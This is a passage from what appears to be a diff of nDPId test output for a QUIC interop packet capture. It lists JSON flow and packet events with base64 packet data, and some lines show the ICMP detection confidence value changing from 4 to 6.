xmNr3suDiWJ08nJtK7eU\/3Dvj\/ONoqM5exqmHYkJmeB\/i3BYkfgX807asMnZtideGvH\/mPNTuLBycK5oBic1paBSf3T6UKDwFomFMK4zRvQ2RTDSsREhwoKBAz9DUi22uSOarNzx4IBJQAnBsKlI7YkUFuQf2bHXLeTlc3sjH22aTbkcpuNQVPhD3jsXLo+uLTFSabB0ejUHrkQJu7N55kc5Hjl\/l+it9+skmXrEhRgrnh+Crc2M75SVQkMGW4nqifvwIUFkprpgBKS3scwqrMQ4XMu9+qfHYRTYA=="} 02139{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":112,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1603816434815,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434815,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAv\/VAAEAR567AqAGAwb4KYuh7EVIE7CoKxAoKCgoIhDOd38iF14kAAETSuj\/6PpYLanmhufRbzBfIfJWqpHveuI64\/eSlK93oC4y6GPXD69PeaFagOPTyFkLIpcEu43y7OCQ1Z35Isk5hak2XHZkMptd7KrQ0EFnJR20xJ\/8s4Hh47hOyrjz0Tb8KAyxJMBwDu01llmEO1Z0EcUEdsorSKLQ\/VLYtmHdEq54kYxwJK6cbambFBrjQfMNHN\/UVp0rFqJczDmgAC1L2e2MT22BlqqRvoo0urlHqeJYQ0fzf9Ma12psTRriGSLqomnfjAnDrYcUuJXKUNEdXIMo0IvCKK8Z2qE53aAwCfpEoAKMk5gq0fRGK85o3RF+aZZt44gpgPnPnQ3e3amJGJyTfNiB0r1\/n8TxhrJAQSkdTnqq4YW8ifhktYPIg4kTB2ijlN5mXKs6fM7HXB7edk1jJ2vRSPS\/Sd1iJC6K7IVGG+b05Hvoqeh26GxYLnmUShKxodNsm5bqP4KQTECZRHJGO5bC3iH2e9AmHFRtcJuV0TEnymRBdJso15Mw5WSKs6MiqZOUVTNhH\/pBSIvkiB59cpoQ2kryiNnrZYHeBm0GW1xHBJINLpHgWU+YOcS01DrnAzJKiAR++TsJqZLlDgEWdgltoevZ9gIp62LQq23k1aN8sOGWxJHB6SR2oFKCim70PXdVeVV2H14toHpbqvnGJ5OQ5TAo9F8H1kILTASoi7zMbCXU+ihgxAsvPHQ0ma57WHD5eEfq+qwnIiOkWrwxRNyE378pWGBYwI8oYScRtd2e51pW5YbrsHNUZOF1BRwr4kRNdeYmvBnBCWqp1oBtltIzrn\/Gfcg3DcXmKdv+wNqmSl5ckBYOsYJvjs7+A0lZkaQsFSCJS6cHnp21uzZtbuJMxnGuFlucbDvkJrbZFiIDRi1zfBizG5xYGqI2LuZiKga47IwNdNLC8VwTruNg1oItufwg14MMC+X8kARERXQPJMtpnlcPMl3ZXZ+eP3TlPgYKElfm8xvSbmiMo\/gyHVDPysxCqGIaONg8hr1XRFRbXCrsQZqBHdR1BEHr2erluZx33TA9nEW4ljFgCY54FmKcPcThHKkex0pfCGVG0rDwn5CMiYlKCqMkq82agukv3RtcLDwavHHxrRJ4GFUlIajj9luP5Su+tOXWCKfvD7RL2peHKYq0oE1i9rkQ3J+6rPx1pfTLMCYUSGyR2ULLEVyAXotaIxy15QIlAlmWMZrgC+hXiaIxq+h
UyINFVkc4FAkBBRAU3EDU5yTv1VQUZR++HeJPUvDn0Ly7STUB7C9GMGsanejmwI9FYR1azwvEiMPzo62YRjgMbM2H450bCbY\/ihQkhW6vCoJACsZGMust90L1tttL0aGDUuM2ekxmmP2SR2XGKJhksWGNk4Qk8NcSbtQGw4rBlTHKDoA+TNa0noiVD30cGIgXZvR4LzxoKJTHmmdOUfJnlbktOUO+L10wT6chVbloEO7Gl6LmuuY63cBoGIu\/9oxZ1fVnf\/qtqp4c5WdmDqlzryd3pEbe\/IAUHs50fQBLfKzcvYMcdoYWKI2XujLzx99HtpnCDcHHfIGi2GBE7lCFUhpHVx\/3REbGwPNIrR5hVqLd9oAN0IWu46FpJq5LdwUTeovYvLw5NA\/DiXOdXc+4fQx+cmbBq4bCo5iPDOTurjVG+AT6KDA=="} 00564{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434818,"flow_last_seen":1603816434818,"flow_idle_time":140000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1603816434818,"l3_proto":"ip4","src_ip":"18.189.84.245","dst_ip":"192.168.1.128","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 
01195{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1603816434818,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":590,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":590,"pkt_l4_len":556,"thread_ts_msec":1603816434818,"pkt":"PKn0qB\/spJGxgjQ5CABFAAJAOvYAABwBN+0SvVT1wKgBgAMDupoAAAAARQAFABYUQAAeERf\/wKgBgBK9VPXVKhFSBOwZ0sAKCgoKCEMxhVUtcFhGAABE0qWeLu1BQPCrvaqmOZLxcjaUsYk9VVde3D76gcDL+4IVysNvEgASSqVVEGYaLPIGcbZ3HxJwj7UTPMN9ktHDGQ7OWCRzA6fqhalBV5YwIQEg3hVGDI6qpqitsVwDd8\/MN70IjnRYlLSnGFiFQz\/+37tcMd3B47Z3XUJqAC2gmAtiiG7FB9bVCqu70\/\/gVbe+y8Aiq8lY3pgapL115bg44IU5ONIr0kPIychpXhB4nGil5WtRlR+PfDZaCteJDe8INKJO7W9rCoQHxbJrdHcgp7qNCAvNvwYE3E7IaJzWzZ\/MoUUAYGiQDU5QZNqlmNLsfw7HRz7KL6RKhXKo6arbCoyf+aekhlzkYvXUC6YXLfcX9b\/uhdcExVVj3t3h3bEjsqfwcBC2sK\/3+ftXoClqu\/uJmzlR\/hQg2UZDVSBch9t4LjNi+WntvWr6v5Vi\/KVQ7U43\/Gm4H1rcanEorBOGJAHhmqtXhOThueWcgpRyjQ5+C\/V2Y42zfQkNRgnvzhVV6TCNj3xIlnBpiCnjYGEauIM5QGTgy7j1eEARKu2SqfuTVUmi6oEn63B+sVeMBPtI+6+VRIb69rup\/\/2zzUrMqEGl1Ofqu0NMNJUBI++5TMEJqz8PBpY7++PNBvTXVMJHf\/6eUtUbUHVIf6h+Omvu2jYTq0R6BWM="} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434818,"flow_last_seen":1603816434818,"flow_idle_time":140000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1603816434818,"l3_proto":"ip4","src_ip":"18.189.84.245","dst_ip":"192.168.1.128","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":7.556211} 
+00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434818,"flow_last_seen":1603816434818,"flow_idle_time":140000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1603816434818,"l3_proto":"ip4","src_ip":"18.189.84.245","dst_ip":"192.168.1.128","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":7.556211} 02153{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1603816434820,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434820,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUApCNAAEARDmLAqAGAjOM0XK5LEVEE7GREwQoKCgoIlk3\/sw8\/b8wAAETS7HTMpNcxINQW3ZN+iCGS1z1IAElwdp\/JkpB1113BzMoCCRTe4FQcqzRNlPfFUuL337y9c\/m0xOQ2BSNabPaJGHp30QAKNdTWLRiE0u0lhDN37WkJ3a18g080qiPj3NOKBzBb6Q2R2eP+Tu5VAgK0JBnSSQxscnBGZYx8erjfdk\/KfB+k80tJ23vgNCBrw5\/QJHyIKFr6T5gcmaoduB6MP68CbMsVTh+UudjvNuCb47BBuKD37H0qZ3vrzszhEdCnaBPaTgDC+BRg\/7zjd8y+\/IMXoc4lcJ6yCEUNd5PMsCArc8JfRjxmtTjKsNnWLKbOCz7De91KYHmwGYzaF+m0hYb600XnI1+GfBH+Yt7Rmih6ZJFb61s4n\/p947s86kVOIDjkRzXFc5rj\/5TsZlNwMgHK1trFOYKfIQD\/nGNPAy3b1yszE1t6bon4A+5+sfdvgO3Pb0vQv7a2RjiEoNWsOgLHHYRaOns5wLvhGDh7p2oiwYoA0dOQULiPA3oPFIYn3l5BexqjNtcP9rDwal7aPEC5NULq7Zmi8SqPrNQKrHxduW\/ejURdhLL6oGYtylwTjf6fFdLzV74euKvQMJtzqOmUVsGs7ytHwIW0zUSVdcXZXNdfHTIBhQmt1LEXywwM9sEku5ONFT5vw3iqnJaeuQ3Z9RVWM6JVZBIIyhtRHSHLMWoMYyVHbzNHU6KHtgRqx4XiFpODAS4ZKLu+YaxH\/jgJPdH9GCKqWFOo09L\/MFa9JOyzZTBHgPL9\/n6dV\/AjYlz2WHUbgl4B47TvtoGesKFiqCifWwa9T\/QAs6VqSsxDxakmj9BwRcyJY9Fh+S0GJgfOD3vdFv7r+qe3nnZPXIMdHvV
uagTE0AYBONNrKgYdX4Ky4qhLEEd5cE9ERtsD2WvjOGP2X1nIyl6Z5fwtC4lFzD4HiYxcWYOwEoRb4XOLMLjHU1VRqf56Q7VOoNVljrqpfUTD3\/kymwOaOw9lLI9P78KYSDd0ItN84RFi9m1ZATEA4B8xDEQ0xgm7gZL75Bj+DcL6tIj3M5q5t+D3grLTkPWXTTA36Ac5nJ553GrmMeyNqRY+oz7\/jmpae2pHhn5y5a\/JNHh99ySrjiURwgTDidnXFv\/avhfUTEIKYf9vmF1mBR2BjGIWblU\/xSsHPpQooMBCE1pv+edhptbedN01raww3dKDhm8PKg0\/39zcyjrIDUoGuCyt7fcWYxL1rSfHDWFvTo3rOPuLREGMhWKH0rTw1rfsvP7pj9wRWFuq+5bjg1YEYzOa+4ow\/G36iMyOEYXSETkFxk1k9PKRQcdv+hmZ7Yysh6jGqSQYubSckYOn7rzqjXzTbZJ4cVerQWc6vzgu\/f8kKoOJaHeHCNS3S8Ih7LoFy\/3HhVH9BOwbPs1b8AjTnrabB9wJd2L4xt25UkVcDS6dONKmrmw3h\/i2PdMTiY3wE4W1wVKTbunysVPKp2ppBpsra6Hdm1iIJV6HfCSSXwO8AyqeAGhx5QFqNqN2LYiejuoyXFW2FmijSjtLOK+Ec8dkYkpgamnxA4iCyf\/yyvNIxQuF3Qi\/hZNj\/3Ane7tlBEi6cG9xsu3lWfzaAh0Qz\/MZBLCWHCiMGpcbinSxoJxeieJR4hwsH6aIGBBARlcM87JIeY9evAugxQ=="} 02151{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1603816434821,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434821,"pkt":"pJGxgjQ5PKn0qB\/sht1gDnzNBNgRQCABCwcKydWupNP+R2kegH0mAB8YIxDSMFEDfZ59dTdPtKIBuwTYf3DECgoKCgiO5tu+VRPaUgAARL4uI1WmPGK3DVcwUtE9UzI\/fGSOKvWUIfYmoO3D6w75gyG6cAgBjzUk1WiaTNGr26SzX\/zj3x5ZOIMX2zmIddjoIJovY\/VksJrC3pfUCteiUGgedji71vrrn0fRMQEFiIkPaa+o8LGRwzZKy8VL3G9cV5Q0+xLvukUHxPfTXr+qeeoAkO2JrC0axiSb2dt+XmaJ0v8nr3ud+va3668mZsfa5EeFafHaj8m49xF7nuzVpSiWax1aZSZzIz6eskzoc+1ob4msOELhchJT5jSTUaY4j8tszC8K1inc5HuVJQLo8TDvFonmdmM0XKQKaWAqfBpL0CUAHrxZaa7bFxHWCI+KCUFVNkIiEsJLT7NG1KiOxkI4gvAPMqLHQoSqFHaylCrhyi1kFotT2StbIZXec2UmPZu2coK0kaliS7gU+LJp4Q8aOd\/VQfT+XwTsJ91oSb1hOc3RVgo0quwGh5ZyNdKZAdfV8mq\/WMkDj4BcFPubTYXGgusxS\/MyTqzT1EFGuLIWfyAbYZyodoA4VbTOGXJwfjifkHUQ+UF72jq+Pt7WCCIYrTBJQnTBEUt2MXfl7vDq69U1d9nIXWmxmxitkWebhf3a424eVpSg7vx40Hu84MnwnUTI47yC+ao94ZGXsWQUy81CB15Bxl9YeNY2dJgyiP+5AD9Mhxzqup58xGvvgfz
wiN+8b9hNWQCIXG3bcsVJVlFTJ+jyJ9stfjENb7psSrJSchNgxcdmCDy8kzTYUD7r2Kyu23la\/A94iZaAc3a3efSo5IpoqV3d1rp5ZAXMrr7FuDpbBbwpjWOv21FHy9XJpndYMkbIqf\/7foTiABMd4OD5ZERwg0xFUm2\/h9OWCHJH83WAL\/V5NLmuNQVhvxqDt4v9kRbwpq1I6YlY65WMno6Jktn5XADL\/7yB9qcTbstxiHDTP9HA52vwZywCZsUeMNyVpwbs6++IutqZF2u1m5rA1TU892YkmC4kF\/6hNawh4kh9uCP\/dmrEgG3fl\/J1TK58qG0QytYAfCJ0cQ5JLCxfl\/NL8mZSVRO1SYiuLHK3ygtYTMGI6vHbmzBIw7efY9+H20\/n9OdFhPZypP\/u3dYpp4p\/C2O0s6ViK29wOFT+K2UH57w75L7qCQIQY8Jmg4QscecIv0AWmnfsG6wos8x03+j\/JR8bgGEsH1SV8kBWJgmpv\/L4R9h36Dkk7I7wbtNl01psL0lyiPNL+Ovmtqzx+\/3Q62hpJ76z0PUEL8rN8W\/mbea\/y56YejegoW0NiHWhNlluWfwxxnN42q0YVuXvbq45KHAswsaiAvSLHS1\/Hfet1IEJQbT92EAZjtTIJs1ukk6S8C7JBdY2mP1nien9nfYAxxwA\/H5mWvSq0j8RX\/AxShyK\/7L5A8yyjy03hGEmr9rECJ4SlYdMS5IlK68iFiJ4CMvIJ+6AyWXezGevi+5ey4ofkQCxFpY1W0uO7lu7+1aV90Ifn3KxnAwNm6+ry4yHqk6IaT4+FTyUTD70bZ5KtnE5J0z9NnVQAnXfMQNLWwACkQ3k4t1jyk2PI9+I4B+PL+e\/IT7Vzp7naSY2nO4exFruJXfEn4uVZmLymCx9K0eX21XvezrLYl21gesFXXXoMBP7pIhtLQ=="} 00514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":116,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":70,"flow_packet_id":2,"flow_last_seen":1603816434822,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":89,"pkt_l4_len":35,"thread_ts_msec":1603816434822,"pkt":"PKn0qB\/spJGxgjQ5ht1gCEs0ACMR8CoF0BgM6YEAzSri\/bO+xasgAQsHCsnVrqTT\/kdpHoB9EVKuPQAj8mT+AAAAAAAIITUj3tZzyB\/\/AAAd\/wAAHP8AABs="} 
00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":117,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1603816434822,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":113,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":113,"pkt_l4_len":59,"thread_ts_msec":1603816434822,"pkt":"PKn0qB\/spJGxgjQ5ht1gAGSQADsRMCYAHxgjENIwUQN9nn11N08gAQsHCsnVrqTT\/kdpHoB9EVGV+gA7uJfFAAAAAAAIQysxrQYDr8z\/AAAg\/wAAH\/8AAB3\/AAAe\/wAAHP8AABtQQ1ExUENRMDpa+to="} 00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":118,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434822,"flow_last_seen":1603816434822,"flow_idle_time":140000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":1240,"flow_avg_l4_payload_len":1240,"midstream":0,"thread_ts_msec":1603816434822,"l3_proto":"ip6","src_ip":"2604:a880:800:a1::1279:3001","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 
02150{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1603816434822,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434822,"pkt":"PKn0qB\/spJGxgjQ5ht1gAFucBNg6MyYEqIAIAAChAAAAABJ5MAEgAQsHCsnVrqTT\/kdpHoB9AQQ1AwAAAABgCGnqBNgRMiABCwcKydWupNP+R2kegH0mBKiACAAAoQAAAAASeTAB2wkBuwTYmHTJCgoKCggVxSlYpn4UkgAARL5ZLsODdf27vLuu6GHs9eSXiVxIAlfs7TcHZcazXn4JE3\/P5JDqe+tOVWQWmWJiN1Zi+QMXxBMeLDuq2FFgXlL2mFN2Y0Hpqzt32q0IcYNEtodCx0cCDcymndGz22NucmhqDhsBTfQYSZ0TGfZ0Y1dj7OIdkztU4UKtQk0Knbx0pPfOb04IoU66JRugmLaY3NcS6\/YWs3i+G\/Z1NaiZhF7wHXHAr7RtRzKLb2gPHbqV9JkwnbYNdieDzqo6OGYxfFJAF9UdpTyC5RofrFHDOiAzzOkMjstRpfIx0da81MZNBFjRQx8VBZVl5cb5VmHHCRKqUJJ\/pimnlqr6\/rH78B0tJyJdMLcbA0k\/GEaMgb2r9k+khrfN+IYPTP9LEK9IyC61PSNuLM7lCBCfjRBxaONHiGk0HUucFiwpQMj72lTAGTUsQa8qFngN+9r0I8HgvmsmOXC4IyatQFicI6JIBY\/\/xLWv+tugw\/qAeO1niZ+nJFTAbwyvKydJ4CrRCQplld36lx1IDKeajrlxvSY4TO7ZlmYtBTR\/QIZQ1n0y7WxFPForSvTZ5LmkvmQy\/XOIdCHzDT+yu3OG+dlOa05oJSJ5squ1DJvlYS4iSqaRgDu8O1f9s7zQOTQDTlP6inO815rKmw1YpQze+QAPS9Ar8Eh6loMYvm597mpGIaaCjBGmRjM30Y3EWQUMoVmSMYlr+ndlJs0\/parg\/PrflXFNfkn\/Wllw4cvS+JLWNhoBBJwDWpM9YkqIgN6sP6Sf1ACXsEwIhZbB5T3Y+mzlz1fEroyxtSisqFOFlOCB2g0djczdb72gMhUvdB4kROfNLNOm8f4hG1ZnJraoSrQJwgrY+zsLAidSwY62GHtAM9fUNITWGPk7OLfW3OjEbL6sh7ywY+xM+yu0nYlxg0Z8ST6zlbK88Dw9rVrViSQ3Oke1RR\/RShjWSOBcuUxTcA\/eXi5dEcOdrVm6ZsDQ0chPleXisZB4yI9mZgj+jwkM4eFcO6OX8YpKRHpSZrb0SkaAHjgOICK+1d\/ehnzz7M0KNYGDy8XZ08SS3gXJzSNXZLonqI\/bweWJiS+9rlVrB5J5IwRHJDEVN2aAZJbdqAdmcFPCL7XDwYisg0GfcM\/dL5C5xxZS6hZbPHwzwJ6y7r6\/T+A0XWV92UuetwR0QSUywswmbazFGMC\/MBz94jyq\/TrHbvq8OgHad29+CNuQfDZZomN6lJoFhgu1iOIbRwea4vmYiVysTLFxxLhym6vQpFJXvihZGX2xoV1bucff9DyhT5\/Wm8sYVpYS8i2GcM3jWfruzg6rk0SVDY6hf8HFcXkvUJGnDN4KwlwULBiTr9COS06u3di2jUKJqL6FFXM1FtZVzdRf3O\/3GNXJ2HDuA4IlWQXWMcKwj7HbOKOWlf39BkQPYB
B\/3CwqDH5TkC7Ny98BmDT6ZzxJIZcSDCUoAZ3M1Es1K7QjuPUiIJlOZZ8vmraAuL1z0zGli+qvbM5O\/6zJbeqSM2M0z0mrGA7v66IfdcHwb0k8mj2tM2aIyHApEXwJPFbWKxWcFb4yW1jdVDOO0Q=="} -00668{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":118,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434822,"flow_last_seen":1603816434822,"flow_idle_time":140000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":1240,"flow_avg_l4_payload_len":1240,"midstream":0,"thread_ts_msec":1603816434822,"l3_proto":"ip6","src_ip":"2604:a880:800:a1::1279:3001","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00668{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":118,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434822,"flow_last_seen":1603816434822,"flow_idle_time":140000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":1240,"flow_avg_l4_payload_len":1240,"midstream":0,"thread_ts_msec":1603816434822,"l3_proto":"ip6","src_ip":"2604:a880:800:a1::1279:3001","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 
02151{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":68,"flow_packet_id":2,"flow_last_seen":1603816434831,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434831,"pkt":"PKn0qB\/spJGxgjQ5ht1gDK7JBNg6MyABGfAABAA0AAAAAAAAAAEgAQsHCsnVrqTT\/kdpHoB9AQRVHgAAAABgDJNoBNgRMiABCwcKydWupNP+R2kegH0gARnwAAQANAAAAAAAAAABqn0BuwTYttHMCgoKCgiHmjxz9S5+NQAARL60MndZKQNzXHuWbuWII8yYjx1QNcGEa3n\/tA\/kZwZdo0+NMbEhrCvw4fqUesktNwPhDHylUS4gcbEvHHb8Knr61qY95Pm5VKwq10YKtyHKrPUvOt6FFf4EaXlhbjCjP5PNGMuBPWvET6CR\/DNJ3amwoZ8AEiUkCCce2IA0+qLjflDvOu19oZVQSJhyk0ID2QUVFxDX+RIo\/BCEiyqGwrxxtUHNgSlpQhvXLPkd7gs0O8q\/1O3MXjjXw3VV1HTEIvgh9CIZHImqbItBAkHFYhj85297ojhzntlLLEMQUeWyYcLZaQRQLAnNxNHIfLFBwCs6Cttccxk8XUgObPlTQVTnnGvEYXJadvbFnkb5nj0E7bmqr23E\/kns4IXbYRFlEjJZfAc6UWDdSOXBoZHXMIAY\/dztkylxbqayCWGkn8v3wQJvR2xFoTyKE+Pp5saXn2uSt4EYi00Uf6fCGbypDRgDr6HED25efO5iFC99NJvuET7V90ObiIxoji+jOYwIL0BCHSm+uFeO8i7r3GmYR0Qg2iAiX6ZmlOl5gmCd40kAXe9Lo\/pKr3+r853YnPdtRNoIckFL+PsGubjlWj714eDNDRnoSoHs8UNwnNN8sF12pzQsAVr7qLBt4e8KWXFMXfkfIKWSnJhvivGIVrhMeN4RiaQ\/jippacCl0CUjlR9AUDC7DyDOswJ0+eP9X+z1Kkt7EaP13RXwGDeKbPLk\/tVc3ZXQShkobo74qelkPT7nbFmTZB78n2grmfmy0C6HMQ+qUHKH\/MfqCCK2ZnmHVM8veaHwzWHFJ4gVd2h5wLXlBRQqCB2AZzoyKpcMZFNpfGh+rTCIwQTyVZzycWPvtrbHzPNg+tUe1i\/foBt0+XApuoCCwHOsgf9nS7IFS3h97hfCh2TYTKBM6t9C3VPFYDuKYfUjriuP3G2Eq7sMAiqBDef1fYGxLN\/Dys1ZS2B2n+Zqt6K1diQtrzsIwKlRRg+XjfSSzPOVrKeXYenyNePWIMOs4YVAyvkFPV4RM\/osDQvZvShUA0iRuuMPCsj024c7WYx9lDihj4EJBymWsIkTQg0x6rfvVrFojeVlS8zgiytvfAIJsOr+k34t3NbLaK0YyfFcVKBnFDiEC5OcAMd0yi6ouvtE9rJyb\/CiH+Vtx9OSGkbowLLyCHtZ1EUgA0\/vr\/mU+ea4hE\/dLdDDjWwxrJg1oKjnYeHQvIDUT0MVaXTlMXS7\/F6HA7\/5QTayU5MU3hKtpwhACAx5gHHhue3iTscqXigKQ7oiaLOdxRIJ2wKmzNzvQPCG5UmOLnsbM\/3lI+SzzLjMM5HxKsnb7yJmS6z2+tdEoxPOa5ZNm7Wc1LoGgLZd+x+V88MeQDFaBDMQHNWCS8z7Ruv7Q8Jc\/JKShee1avRiWD+QjKfpjPULJzGh
q8IhO+3xUZoq\/xSnX5PQ7xqYQY3oim9xsL+ADJPPe0oE2O\/lbNfbGhouInwUUVqUmdk\/fion2o\/ylxCHaGoB6j8tJgJq8ystdV8ErJCcEhkKohD7qeUu1YL\/exHAdFqCo5yGAJyVZFmJD6CkMA=="} 02148{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1603816434836,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434836,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAiNlAAEARQ6DAqAGAyu7cXIm\/EVIE7N5MyAoKCgoIV4qr8UTBK3QAAETSZYQqq5\/hhyGtCz3Zmoi9jrKsnf3wjCZq1mxPTTEfXwdslpFlNBBYDqBuOo+QKDkWn4ZFD\/5qQ8sD8A+lBYGJV+nw5hbll6er2441gO5dAvGVUTjoFTcs61bhJdzOUrux599yFBfTAFDZKYhyBebkHPNDrNvPvVpxfBpxhEGHEq59jbH7Kx56FJtjtSZa9HQG\/OGEFc4JVYBfZDPBXIhzLUdX2JND3qWMQuwP2Xy5LdfjKHYwwsqNQgrtYOT1t6v+Zvqju\/oAictN1dRCuNXP91Pwy5MQysbtofZHqB7e2yb+jFxm4ZMqy+00qpKT7ne5IWIOVRZxjqMikenSsN73RG+rLd\/uLSPXcSlufRT\/qpMuPbNQ6s7DEcokvc85KmowVE9PiWIPrZuSb0oRHuoTyejJTscJK3si7Et7GQNCLhwsIS2k6fsRMPFVceoIZZfXs2PzKq3\/O9EH2D79eeGzP8A5iwmMT7Aab8l3\/6R8LVM6+3PQfPi4jLK+XHWMQbg41\/J9uEQZI5HuTWWQzwcn9UAcG0g4gwcOPmZDzviupQ5tg+\/9eADTReJpa4xS3oYZdywwA3VZsNHvhQf4dL7aplXzKSWQO9B68xf5V1q4gM+CvIJUrE82UCwH8VaOoe1AoHNWtyDW0Ap5d2vSy04x+4EyhLNBj26v3fhqsQcn6Z6a4KwdLKikQaoiVxarNgN+CFr1yDWsPRCqJMe40bhwuS4sWkiGWh8Cv9gLXeNDdRPqaqgBh82GLE7iFA\/U5vdRjLNfTPPFimOZbexduSJLGwwVJejCCwbDdk7Vba1zDnWr6vIMpidFE15bqu1CaUX4wOlMw+UlJ\/Rck\/7v\/g8MgCArdyT52lbEFkxfiUbz9r7dzxe9yAYfnvExfNJocGmNo8cp9UGEZb+Z+fpXkVwNrnTpe82QFjYekWIeghnThVtpzRW6HVEFowML2gXzrgBYWnXVabb+z8NJa9KhgDfRxGY6Qmo7vTY41l2P1aqPcxNOTuIr8rCBIdn5egFmlP6+j3I3zePWc7fsh+HpzbSu2qNxOPfDHrqGgaMf65DyMBQwQD\/2tXTWsn7Vrz+vyWwxpeVt4t+pbwKmIHhkkdrbIJF9mTZzSgQFhOrxmOkT\/t3tmzM4BHRcRs6UQmLnryAbmkEWPDFwWiKG5ro9OVh\/yjexJN4pRIEK9lXHUYCFUgWFM5ofQyZB+jTZyWZLMauwYFWJOs0N1nGD